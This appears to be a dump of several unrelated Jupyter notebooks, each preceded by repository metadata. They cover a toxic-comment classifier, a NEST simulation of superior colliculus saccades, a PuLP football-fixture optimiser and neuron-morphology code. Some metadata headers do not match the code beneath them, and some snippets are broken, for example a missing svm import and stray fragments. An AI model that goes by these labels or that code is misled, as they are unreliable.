# Our query article is about Trump, Huffington Post and the election. The top 10 most similar documents in the corpus also contain these topics, as their title show above. The reader can print out the full articles, or visualise the topic distributions for the most similar document and compare them to the query document to check the overlap.
# ## Conclusion
#
# - After cleaning the corpus and keeping only the top 15,000 words, we reduced the unique words in the corpus by 84%
# - The average document length is halved to 345 tokens after cleaning, compared to the raw version we saw in our explore notebook using word2vec
# - The LDA algorithm was explained in detail
# - The LDA model was able to accurately identify different topics in the fake news corpus. We visually inspected these topics to see that the top words were related
# - We were able to infer a topic distribution from a new unseen document
# - We quickly retrieved the most similar documents in the trained corpus when comparing to the new unseen document. These most similar documents were in fact closely related to the query document
| 24,542 |
/IBM Applied Data Science Capstone.ipynb
|
c0f84ecd9014f9a2c13f1c5e9708c5069743d96d
|
[] |
no_license
|
tvandenboom/Coursera_Capstone
|
https://github.com/tvandenboom/Coursera_Capstone
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,313 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %load_ext jupyternotify
# +
import pandas as pd
import numpy as np
import urllib
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.metrics import roc_auc_score
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
import re
# -
from sklearn import metrics
from sklearn.metrics import confusion_matrix
# +
# download annotated comments and annotations
ANNOTATED_COMMENTS_URL = 'https://ndownloader.figshare.com/files/7554634'
ANNOTATIONS_URL = 'https://ndownloader.figshare.com/files/7554637'
def download_file(url, fname):
urllib.request.urlretrieve(url, fname)
download_file(ANNOTATED_COMMENTS_URL, 'attack_annotated_comments.tsv')
download_file(ANNOTATIONS_URL, 'attack_annotations.tsv')
# -
comments = pd.read_csv('attack_annotated_comments.tsv', sep = '\t', index_col = 0)
annotations = pd.read_csv('attack_annotations.tsv', sep = '\t')
comments.head()
annotations.head()
# labels a comment as an atack if the majority of annoatators did so
labels = annotations.groupby('rev_id')['attack'].mean() > 0.6
# labels = annotations.groupby('rev_id')['attack'].mean() > 0.5
# join labels and comments
comments['attack'] = labels
# remove newline and tab tokens
comments['comment'] = comments['comment'].apply(lambda x: x.replace("NEWLINE_TOKEN", " "))
comments['comment'] = comments['comment'].apply(lambda x: x.replace("TAB_TOKEN", " "))
comments.head()
# Percentage of train, test, and dev data in original data
comments.split.value_counts() / len(comments.index)
# split training, development and testing
train_comments = comments.query("split=='train'")
dev_comments = comments.query("split=='dev'")
test_comments = comments.query("split=='test'")
# get rid of rev_id, year, logged_in, ns, sample column that will not be used in training
# only keep comments as training feature
def get_X_Y(data):
X = data.comment
Y = data.iloc[:, -1]
return X, Y
X_train, Y_train = get_X_Y(train_comments)
X_dev, Y_dev = get_X_Y(dev_comments)
X_test, Y_test = get_X_Y(test_comments)
# ## Text cleaning
## Make sur nltk is downloaded
import nltk.data
nltk.data.path = ['/Users/liangpengzhuang/Downloads/nltk_data']
from nltk.corpus import stopwords
stop_words = set(stopwords.words("english"))
# +
# Code reference https://www.kaggle.com/c/word2vec-nlp-tutorial
# -
# Clean comment string, and return a list of words
# Only consider character and number
def comment_to_wordlist(review, remove_stopwords=True):
# Remove non-letters
review = re.sub("[^a-zA-Z ]"," ", review)
words = review.lower().split()
if remove_stopwords:
words = [w for w in words if not w in stop_words]
return words
# +
# Load the punkt tokenizer
# tokenizer = nltk.data.load('/Users/liangpengzhuang/Downloads/nltk_data/tokenizers/punkt/english.pickle')
tokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')
# function to split a review into parsed sentences. Comments will be divided to sentences first, and then transform to
# list of words
def review_to_sentences( comment, tokenizer, remove_stopwords):
# Use the NLTK tokenizer to split the paragraph into sentences
raw_sentences = tokenizer.tokenize(comment.strip())
sentences = []
for raw_sentence in raw_sentences:
# If a sentence is empty, skip it
if len(raw_sentence) > 0:
# Otherwise, call review_to_wordlist to get a list of words
sentences.append( comment_to_wordlist(raw_sentence, remove_stopwords))
# Return the list of sentences (each sentence is a list of words,
# so this returns a list of lists
return sentences
# -
# ## N-gram features
# ### cleanning method 1 - Liangpeng
def clean_text(comment):
words = comment_to_wordlist(comment)
return ' '.join(words)
X_train_clean = X_train.apply(clean_text)
X_test_clean = X_test.apply(clean_text)
# ### cleanning method 2 - Kingston
# true recall + 0.01
# +
# import nltk
# nltk.download()
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import string
import re
def text_clean(text):
tokens = word_tokenize(text)
# tokens = [w.replace("NEWLINE_TOKEN", " ") for w in tokens]
# tokens = [w.replace("TAB_TOKEN", " ") for w in tokens]
tokens = [w.lower() for w in tokens]
table = str.maketrans('','', string.punctuation)
tokens = [w.translate(table) for w in tokens]
tokens = [w for w in tokens if w.isalpha()]
stop_words_list = set(stopwords.words('english'))
tokens = [w for w in tokens if w not in stop_words_list]
filted_text = ' '.join(tokens)
return filted_text
# -
X_train_clean = X_train.apply(text_clean)
X_test_clean = X_test.apply(text_clean)
# ### Character level
clf_char = Pipeline([
('vect', CountVectorizer(analyzer='char', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC()),
])
clf_char = clf_char.fit(X_train_clean, Y_train)
Y_pred = clf_char.predict(X_test_clean)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Word level
# #### LinearSVC
clf_word = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,1))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC(
# dual=False,
# tol = 0.01,
# loss='hinge',
class_weight='balanced'
)),
])
clf_word = clf_word.fit(X_train_clean, Y_train)
Y_pred = clf_word.predict(X_test_clean)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# #### SVM
clf_word = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', svm.SVC()),
])
clf_word = clf_word.fit(X_train_clean, Y_train)
Y_pred = clf_word.predict(X_test_clean)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print('Test ROC AUC: %.3f' %auc)
print('Confusion matrix: ', conf)
# ## Hyper-parameter Tunning
# ### LinearSVC
#
text_clf = Pipeline([
('vect', CountVectorizer(max_features = 10000, ngram_range=(1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC(verbose=1)),
])
# +
param_grid = {
# 'clf__penalty':['l1','l2'],
'clf__loss':['hinge','squared_hinge'],
# 'clf__dual':[False],
'clf__tol':[1e-2,1e-4],
"clf__C":[1.0],
# "clf__kernel" : ['rbf', 'linear', 'poly','sigmoid','precomputed'],
# "clf__degree" : [1, 2, 3, 4, 5],
'clf__class_weight':[None],
}
from pprint import pprint
pprint(param_grid)
# +
from sklearn.model_selection import GridSearchCV
gs_clf = GridSearchCV(estimator=text_clf, param_grid=param_grid, n_jobs=-1)
gs_clf.fit(X_train_clean, Y_train)
# -
print(gs_clf.best_score_)
for param_name in sorted(param_grid.keys()):
print("%s: %r" % (param_name, gs_clf.best_params_[param_name]))
# ### SVM
text_clf = Pipeline([
('vect', CountVectorizer(max_features = 10000, ngram_range=(1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', svm.SVC()),
])
# +
param_grid = {
"clf__C" : [0,1,2,3],
"clf__kernel" : ['rbf', 'linear', 'poly','sigmoid','precomputed'],
"clf__degree" : [1, 2, 3, 4, 5],
'clf__tol':[1e-2,1e-1,1e-3],
'class_weight':['balanced',None]
}
from pprint import pprint
pprint(param_grid)
# -
# ### Stemmer
# Stemmers remove morphological affixes from words, leaving only the word stem.
from nltk.stem import PorterStemmer
ps = PorterStemmer()
def word_to_stem(comment):
words = comment_to_wordlist(comment)
words_out = []
for word in words:
words_out.append(ps.stem(word))
return ' '.join(words_out)
X_train_stem = X_train.apply(word_to_stem)
X_test_stem = X_test.apply(word_to_stem)
clf_word_stem = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC()),
])
clf_word_stem = clf_word_stem.fit(X_train_stem , Y_train)
Y_pred = clf_word_stem.predict(X_test_stem)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Lemmatizer
# Lemmatize using WordNet's built-in morphy function.
# Returns the input word unchanged if it cannot be found in WordNet.
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
lemmatizer = WordNetLemmatizer()
from nltk import pos_tag
def word_lemm(comment, tokenizer, remove_stopwords=True):
sentences = review_to_sentences(comment, tokenizer, remove_stopwords)
feature_str = ''
for sent in sentences:
tag = pos_tag(sent)
for tuple_pair in tag:
pos = get_wordnet_tag(tuple_pair[1])
if len(pos) > 0:
feature_str += lemmatizer.lemmatize(tuple_pair[0], pos=pos) + ' '
else:
feature_str += lemmatizer.lemmatize(tuple_pair[0]) + ' '
return feature_str
def get_wordnet_tag(tag):
if tag.startswith('J'):
return wordnet.ADJ
elif tag.startswith('V'):
return wordnet.VERB
elif tag.startswith('N'):
return wordnet.NOUN
elif tag.startswith('R'):
return wordnet.ADV
else:
return ''
X_train_lemm = X_train.apply(lambda x: word_lemm(x, tokenizer))
X_test_lemm = X_test.apply(lambda x: word_lemm(x, tokenizer))
clf_word_lemm = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC()),
])
clf_word_lemm = clf_word_lemm.fit(X_train_lemm , Y_train)
Y_pred = clf_word_lemm.predict(X_test_lemm)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
% notify -m 'cool'
from sklearn import metrics
print(metrics.classification_report(Y_test, Y_pred))
# ## Embedding derived features
# ### Word2Vec
# +
# Code reference: http://nadbordrozd.github.io/blog/2016/05/20/text-classification-with-word2vec/
# -
# #### Self-trained Word2Vec model
from gensim.models import word2vec
X_total, Y_total = get_X_Y(comments)
# Get a list of all sentences in over comments for word2vec model training
def get_all_sent(data):
all_sent = []
for idx, value in data.iteritems():
all_sent += review_to_sentences(value, tokenizer, remove_stopwords=False)
return all_sent
all_sent = get_all_sent(X_total)
# Train a w2v model using all comments
def train_w2v(sentences, num_features):
model = word2vec.Word2Vec(sentences, sg=1, workers=4, \
size=num_features, min_count = 1, \
window = 10, sample = 1e-3, iter=5)
return model
# Train the model with 300 features
w2v_model = train_w2v(all_sent, 300)
# Get all word vectors from trained model
word_vectors = w2v_model.wv
w2v_model.save('w2v_model')
X_train_w2v = X_train.apply(lambda x: comment_to_wordlist(x,remove_stopwords=False))
X_test_w2v = X_test.apply(lambda x: comment_to_wordlist(x,remove_stopwords=False))
# Word2vec return a 300 dimension vector for each word in the comment, to transfrom a entire comment to a vector
# Averaging word vectors for all words in a text.
class MeanEmbeddingVectorizer(object):
def __init__(self, word2vec):
self.word2vec = word2vec
self.dim = 300
def fit(self, X, y):
return self
def transform(self, X):
return np.array([
np.mean([self.word2vec[w] for w in words if w in self.word2vec]
or [np.zeros(self.dim)], axis=0)
for words in X
])
clf_w2v_self = Pipeline([
('w2v-embed', MeanEmbeddingVectorizer(word_vectors)),
('clf', LinearSVC()),
])
clf_w2v_self = clf_w2v_self.fit(X_train_w2v, Y_train)
Y_pred = clf_w2v_self.predict(X_test_w2v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
from collections import Counter, defaultdict
# Similar with previous MeanEmbeddingVectorizer, instead, using Tfidf
class TfidfEmbeddingVectorizer(object):
def __init__(self, word2vec):
self.word2vec = word2vec
self.word2weight = None
self.dim=300
def fit(self, X, y):
tfidf = TfidfVectorizer(analyzer=lambda x: x)
tfidf.fit(X)
# if a word was never seen - it must be at least as infrequent
# as any of the known words - so the default idf is the max of
# known idf's
max_idf = max(tfidf.idf_)
self.word2weight = defaultdict(
lambda: max_idf,
[(w, tfidf.idf_[i]) for w, i in tfidf.vocabulary_.items()])
return self
def transform(self, X):
return np.array([
np.mean([self.word2vec[w] * self.word2weight[w]
for w in words if w in self.word2vec] or
[np.zeros(self.dim)], axis=0)
for words in X
])
clf_w2v_self_tfid = Pipeline([
('w2v-embed', TfidfEmbeddingVectorizer(word_vectors)),
('clf', LinearSVC()),
])
clf_w2v_self_tfid = clf_w2v_self_tfid.fit(X_train_w2v, Y_train)
Y_pred = clf_w2v_self_tfid.predict(X_test_w2v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Doc2Vec
# #### Self-trained Doc2Vec model
from gensim.models.doc2vec import TaggedDocument
from gensim.models import Doc2Vec
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize, sent_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
X_total, Y_total = get_X_Y(comments)
X_total_d2v = X_total.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
# Tagged doc is the required input format for doc2vec training
# Each tagged document has a list of words, and a unique tag for furture vector retrival
def build_taggedDoc(data):
data_total = []
for idx, words in data.iteritems():
doc = TaggedDocument(words, ['SENT' + str(idx)])
data_total.append(doc)
return data_total
tagged = build_taggedDoc(X_total_d2v)
def train_d2v(lr, T, data):
model = Doc2Vec(vector_size=300, min_count=1, sample=len(data), alpha=lr, min_alpha=lr, epochs=T)
model.build_vocab(data)
model.train(data, epochs=model.epochs, total_examples=model.corpus_count)
return model
d2v_model = train_d2v(0.025, 20, tagged)
def get_vector(d2v_model, doc_data):
x_data = []
for idx, words in doc_data.iteritems():
label = 'SENT' + str(idx)
x_data.append(d2v_model.docvecs[label])
return np.array(x_data)
X_train_d2v, Y_train = get_X_Y(train_comments)
X_test_d2v, Y_test = get_X_Y(test_comments)
X_train_d2v = X_train_d2v.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
X_test_d2v = X_test_d2v.apply(lambda x: comment_to_wordlist(x, remove_stopwords=True))
X_train_d2v_v = get_vector(d2v_model, X_train_d2v)
X_test_d2v_v = get_vector(d2v_model, X_test_d2v)
clf_d2v = LinearSVC()
clf_d2v.fit(X_train_d2v_v, Y_train)
Y_pred =clf_d2v.predict(X_test_d2v_v)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ## Syntactic features
# ### Text and part-of-speech(POS) tagging
# Instead word as feature, and its POS tag as addition feature
# Eg: 'I like cat' -> 'i i_NNS like like_VBP cat cat_NN'
def get_pos_feature(data, tokenizer, remove_stopwords=False):
sentences = review_to_sentences(data, tokenizer, remove_stopwords)
feature_str = ''
for sent in sentences:
tag = pos_tag(sent)
for tuple_pair in tag:
feature_str += tuple_pair[0] + ' '
feature_str += tuple_pair[0] + '_' + tuple_pair[1] + ' '
return feature_str
X_train_pos = X_train.apply(lambda x: get_pos_feature(x, tokenizer))
X_test_pos = X_test.apply(lambda x: get_pos_feature(x, tokenizer))
clf_pos_tag = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC()),
])
clf_pos_tag =clf_pos_tag.fit(X_train_pos, Y_train)
Y_pred = clf_pos_tag.predict(X_test_pos)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
sets = set(['NN','JJ','JJR','JJS','VB','VBD','VBG','VBN','VBP','VBZ','PRP'])
# Only consider Noun, Verb, Adjective, Pronoun
def get_pos_feature_wo(data, tokenizer, remove_stopwords=False):
sentences = review_to_sentences(data, tokenizer, remove_stopwords)
feature_str = ''
for sent in sentences:
tag = pos_tag(sent)
for tuple_pair in tag:
if tuple_pair[1] in sets:
# Ignore the tense in tagging
# Eg: both took, take will be tagged 'V'
if 'V' in tuple_pair[1]:
feature_str += tuple_pair[0] + '_' + 'V' + ' '
# Ignore comparable in adjective
# Eg: Both clean, cleaner, cleanest will be tagged 'J'
elif 'J' in tuple_pair[1]:
feature_str += tuple_pair[0] + '_' + 'J' + ' '
else:
feature_str += tuple_pair[0] + '_' + tuple_pair[1] + ' '
return feature_str
X_train_pos_wo = X_train.apply(lambda x: get_pos_feature_wo(x, tokenizer))
X_test_pos_wo = X_test.apply(lambda x: get_pos_feature_wo(x, tokenizer))
clf_pos_tag_wo = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
('clf', LinearSVC()),
])
clf_pos_tag_wo =clf_pos_tag_wo.fit(X_train_pos_wo , Y_train)
Y_pred = clf_pos_tag_wo.predict(X_test_pos_wo)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ## Combine BOW with Word2Vec
clf_vectorize = Pipeline([
('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
('tfidf', TfidfTransformer(norm = 'l2')),
])
x_train_b = clf_vectorize.fit_transform(X_train_clean).todense()
x_test_b = clf_vectorize.fit_transform(X_test_clean).todense()
x_train_em = MeanEmbeddingVectorizer(word_vectors).transform(X_train_clean)
x_test_em = MeanEmbeddingVectorizer(word_vectors).transform(X_test_clean)
x_train_br = np.apply_along_axis(lambda x: np.squeeze(np.asarray(x)), 1, x_train_b)
x_test_br = np.apply_along_axis(lambda x: np.squeeze(np.asarray(x)), 1, x_test_b)
x_train_be = np.c_[x_train_br, x_train_em]
x_test_be = np.c_[x_test_br, x_test_em]
clf_svc = LinearSVC()
clf_svc.fit(x_train_be, Y_train)
Y_pred = clf_svc.predict(x_test_be)
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
| 19,694 |
/Scripts/.ipynb_checkpoints/saccade_amplitude-checkpoint.ipynb
|
1f41097de177ce5adbbd00878ce95813e7ce8247
|
[] |
no_license
|
imcomba/SuperiorColliculus
|
https://github.com/imcomba/SuperiorColliculus
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 168,036 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Trenes y densidades de spikes para diferentes amplitudes del sacádico.
# %matplotlib notebook
import matplotlib.pyplot as plt
import numpy
import nest
nest.Install('scmodule')
nest.SetKernelStatus({"resolution": 0.01})
num_neurons = 200
num_deg = 7
sigma = 8.0 #ms amplitud de la kernel gaussiana
min_tau = 10.0 #constante de tiempo de adaptación mínima
max_tau = 80.0 #constante de tiempo de adaptación máxima
wexc_factor = 0.160 #nS Factor de excitación
winh_factor = 0.05 #nS Factor de inhibición
syn_exc = 0.4 #mm rango de sinápsis excitatorias
syn_inh = 1.2 #mm rango de sinápsis inhibitorias
max_pos = 5.0 #mm posición anatómica máxima
min_pos = 0.0 #mm posición anatómica mínima
#Logarithmic mapping function
Bu = 1.4 #mm
A = 3 #deg
min_sacc_amp = 3
max_sacc_amp = 51
simulation_len = 300.0
# Calculo la posición de la neurona activada en función de la amplitud del sacádico.
# Utilizo la función logarítmica de mapeo.
position = numpy.linspace(min_pos, max_pos, num_neurons)
r = numpy.linspace(min_sacc_amp, max_sacc_amp, num_deg) #amplitudes del sacádico
ut=Bu*numpy.log((r+A)/A) #posición del sacádico en función de la amplitud
distance = numpy.zeros((len(position),len(ut)))
#matriz de distancias entre la posición central de sacádico y la posición de la neurona
for idx_p,pos in enumerate(position):
for idx_s,site in enumerate(ut):
distance[idx_p,idx_s] = numpy.absolute(pos-site)
id_min_dis = numpy.argmin(distance, axis=0) #neurona central
print id_min_dis
print r
# Creo las capas, formadas por 200 neuronas. Empiezo por la primera amplitud del sacádico para definir la distancia dentro de los parámetros de la población del generador.
sacc_3 = distance[:,0]
GEN_list = []
for dist_3 in sacc_3:
GEN_list.append({"i0":3.0, "beta":0.03, "gamma":1.8, "pop":0.5, "sc_onset":0.0, "distance":dist_3})
GEN_pop = nest.Create("sc_generator", num_neurons, params=GEN_list)
FEF_dict = {"C_m":50.0,"t_ref":0.0,"V_reset":-55.0,"E_L":-70.0, "g_L":2.0, "I_e":0.0, "a":0.0, "b":60.0,
"Delta_T":2.0, "tau_w":30.0, "V_th":-50.0, "V_peak":-30.0}
FEF_pop = nest.Create("aeif_cond_exp", num_neurons, params=FEF_dict)
tau_net = numpy.linspace(max_tau, min_tau, num_neurons)
SC_list = []
for tau_w in tau_net:
SC_list.append({"C_m":280.0,"t_ref":0.0, "V_reset":-45.0, "E_L":-70.0, "g_L":10.0,"I_e":0.0, "a":4.0,
"b":80.0, "Delta_T":2.0,"V_th":-50.0, "V_peak":-30.0,"E_ex":0.0, "tau_syn_ex":5.0,
"E_in":-80.0, "tau_syn_in":10.0, "tau_w":tau_w})
SC_pop = nest.Create("aeif_cond_exp",num_neurons, params=SC_list)
# Añado las conexiones laterales dentro de la población SC.
# +
#Lateral intracollicular connections
position = numpy.linspace(min_pos, max_pos, num_neurons)
wexc = numpy.zeros((num_neurons*num_neurons))
sc_filas = numpy.repeat(range(num_neurons), num_neurons)
sc_colum = numpy.tile(range(num_neurons), num_neurons)
wexc = wexc_factor*numpy.exp(-(numpy.square(position[sc_filas]-position[sc_colum]))
/(2*numpy.square(syn_exc)))
wexc = wexc.reshape((num_neurons,num_neurons))
numpy.fill_diagonal(wexc,0)
wind = numpy.zeros((num_neurons*num_neurons))
ind_filas = numpy.repeat(range(num_neurons), num_neurons)
ind_colum = numpy.tile(range(num_neurons), num_neurons)
winh = winh_factor*numpy.exp(-(numpy.square(position[ind_filas]-position[ind_colum]))
/(2*numpy.square(syn_inh)))
winh = winh.reshape((num_neurons,num_neurons))
numpy.fill_diagonal(winh,0)
conn_dict = {'rule':'all_to_all', 'autapses': True}
syn_dict_exc = {'weight': wexc, 'delay':1.0}
nest.Connect(SC_pop, SC_pop, conn_spec = conn_dict, syn_spec = syn_dict_exc)
syn_dict_inh = {'weight': -winh, 'delay':1.0}
nest.Connect(SC_pop, SC_pop, conn_spec = conn_dict, syn_spec = syn_dict_inh)
# -
# Utilizo el polinomio de segundo grado para calcular los pesos de la sinápsis.
def funcion_polinomio(tau_net):
return ((-0.001803*tau_net*tau_net) + (0.2925*tau_net) + 3.432)
wei_net = funcion_polinomio(tau_net)
nest.Connect(GEN_pop, FEF_pop, "one_to_one", syn_spec={'weight':1.0, 'delay':1.0})
syn_dict = {'weight': wei_net, 'delay':1.0}
nest.Connect(FEF_pop, SC_pop, "one_to_one", syn_spec=syn_dict)
spikedetector = nest.Create("spike_detector", params={"withgid":True, "withtime":True})
nest.Connect(SC_pop, spikedetector, syn_spec={'delay':1.0})
# Defino los diccionarios con las distintas distancias para cada una de las posibles amplitudes del sacádico. Inicio la simulación de cada una de las amplitudes cada 'simulation_len' ms.
for idx_sacc in range(0, len(r)):
dicts = [{'distance':value,"sc_onset":idx_sacc*simulation_len} for value in distance[:,idx_sacc]]
nest.SetStatus(GEN_pop, dicts)
nest.Simulate(simulation_len)
# Cálculo de la kernel gaussiana.
dSD = nest.GetStatus(spikedetector)[0]
evs = dSD["events"]["senders"]
tspk = dSD["events"]["times"]
def gaussian_funct(time_diff, sigma):
return (1/(sigma*numpy.sqrt(2*numpy.pi))*numpy.exp(-(time_diff*time_diff)/(2*(sigma*sigma))))
# +
t = numpy.arange(-30.0, 80.0, 0.1)
gauss = numpy.zeros((len(r),t.shape[0]))
for id_sacc in range(0, len(r)):
tini = id_sacc*simulation_len
tend = tini+simulation_len
sel_spk = numpy.logical_and(tspk>tini, tspk<tend)
idx_central = id_min_dis[id_sacc]
neu_central = SC_pop[idx_central]
spk_central = numpy.logical_and(evs==neu_central, sel_spk)
first_spk = numpy.min(tspk[spk_central])
for spike in tspk[spk_central]:
time_diff = t-(spike-first_spk)
gauss[id_sacc,:] = gauss[id_sacc,:]+(gaussian_funct(time_diff, sigma))
gauss = gauss*1e3
# -
plt.figure()
plt.plot(t, gauss.T)
plt.xlabel('Time (ms)')
plt.ylabel('Spike density (spk/s)')
plt.legend([' 3 deg','11 deg', '19 deg', '27 deg', '35 deg', '43 deg', '51 deg'])
# Fig.15. Función de densidad de los spikes de la neurona central para diferentes amplitudes del sacádico.
plt.figure()
plt.plot(tspk,evs,".")
plt.ylabel('Number of neurons')
plt.xlabel('Time(ms)')
# Fig.16. Trenes de spikes en función de las amplitudes del sacádico.
# Número de spikes en la neurona central.
| 6,416 |
/clustering_stud.ipynb
|
6b4dbc6c8ec3891c2f51caa1d052a0d1b2520feb
|
[] |
no_license
|
krzysztofnowakuz/DS_postgraduate
|
https://github.com/krzysztofnowakuz/DS_postgraduate
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,146,383 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/GLuarte/TareasX/blob/master/Fixture_Futbol_(TareaSofi).ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="RyjDORS8xPSN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="00b2aa43-03cf-41ae-c0ba-89c321aaa424"
# !pip install pulp
# + id="bJ1zCjujxJHG" colab_type="code" colab={}
from pulp import *
import numpy as np
# + id="fQNLramZxTFV" colab_type="code" colab={}
a=4
m=3
n=5
#equipos_m=[]
#for i in range (1,m+1):
# eq='Equipo '+str(i)
# equipos_m.append(eq)
#equipos_n=[]
#for i in range (m+1,m+n+1):
# eq='Equipo '+str(i)
# equipos_n.append(eq)
#equipos=equipos_m+equipos_n
fechas=[]
for i in range (1,m+n):
eq='Fecha '+str(i)
fechas.append(eq)
# + id="_W7PhkXAZXF6" colab_type="code" colab={}
equipos_m=['Colo Colo','U de Chile','U Catolica']
equipos_n=['Dep Iquique','Cobresal',"O'Higgins",'Huachipato','UdeC']
equipos=equipos_m+equipos_n
# + id="zV9EjRltXnYw" colab_type="code" colab={}
torneo=np.zeros((len(fechas),len(equipos),len(equipos)))
# + id="JQuA_CONyEBP" colab_type="code" colab={}
x=LpVariable.dicts('Partido',
[(i,j,k) for i in equipos for j in equipos for k in fechas],
lowBound=0,
upBound=1,
cat='Integer'
)
# + id="JdlOCiIt0Kth" colab_type="code" colab={}
z=LpProblem('FixtureFutbol',LpMaximize)
# + id="3hr4aSPGRz0u" colab_type="code" colab={}
z+=lpSum((x[(i,j,k)])for k in fechas for i in equipos for j in equipos)
# + id="d44pTaRuB19_" colab_type="code" colab={}
# No se puede jugar contra si mismo
for i in equipos:
for k in fechas:
z+=x[(i,i,k)]==0
# + id="cEsgz-zIJjYC" colab_type="code" colab={}
#Todos deben jugar contra todos
for i in equipos:
for j in equipos:
z+=lpSum((x[(i,j,k)]+x[(j,i,k)])for k in fechas)<=1
# + id="IiRQEWz9CXrt" colab_type="code" colab={}
#cada equipo debe jugar 1 partido x fecha
for j in equipos:
for k in fechas:
z+=lpSum((x[(i,j,k)]+x[(j,i,k)]) for i in equipos)==1
# + id="XlKovKLkNpG_" colab_type="code" colab={}
#se deben juar un maximo de 'a' partidos como local
for i in equipos:
z+=lpSum((x[(i,j,k)])for k in fechas for j in equipos )<=a
# + id="n7NHgLFJU__5" colab_type="code" colab={}
#se deben priorizar los clasicos para las ultimas fechas
z+=lpSum((x[(i,j,k)]+x[(j,i,k)])for i in equipos_m for j in equipos_m for k in fechas[:3])==0
# + id="VuIw5wo3QRQ3" colab_type="code" colab={}
#Los equipos pequeños deben jugar a lo menos 1 partido de local
z+=lpSum((x[(i,j,k)])for i in equipos_n for j in equipos_m for k in fechas)>=1
# + id="Tue-qEf_SEoV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="7474cb08-c2e3-4bb5-df88-d1696fd7d345"
z.writeLP('tareaSofi.lp')
z.solve()
print('status:', LpStatus[z.status])
#for v in z.variables():
# print(v.name, v.varValue)
print ('FO:',value(z.objective))
# + id="A53LQKpwYKB-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 745} outputId="eefce4a5-517b-4f4d-b8f6-21c342d5f7e2"
for n,k in enumerate(fechas):
for m,j in enumerate(equipos):
for l,i in enumerate(equipos):
torneo[n,l,m]=float(x[(i,j,k)].varValue)
if torneo[n,l,m]==1:
print(k,i,'vs',j)
print('\n')
ca)['region']
ca = ca[ca.region.isin(tid)]
cc, outlier_ratio = get_center(ca, False)
# cc = ca.loc[cc]
# cc
# +
axon_dict = {}
nlist_selected = []
axon_df = pd.DataFrame(index=nlist, columns=['x', 'y', 'z', 'length'])
for i in nlist:
# for i in ['17545_00054']:
cswc = ns.neurons[i].swc.copy()
cswc = cswc[cswc.type==2]
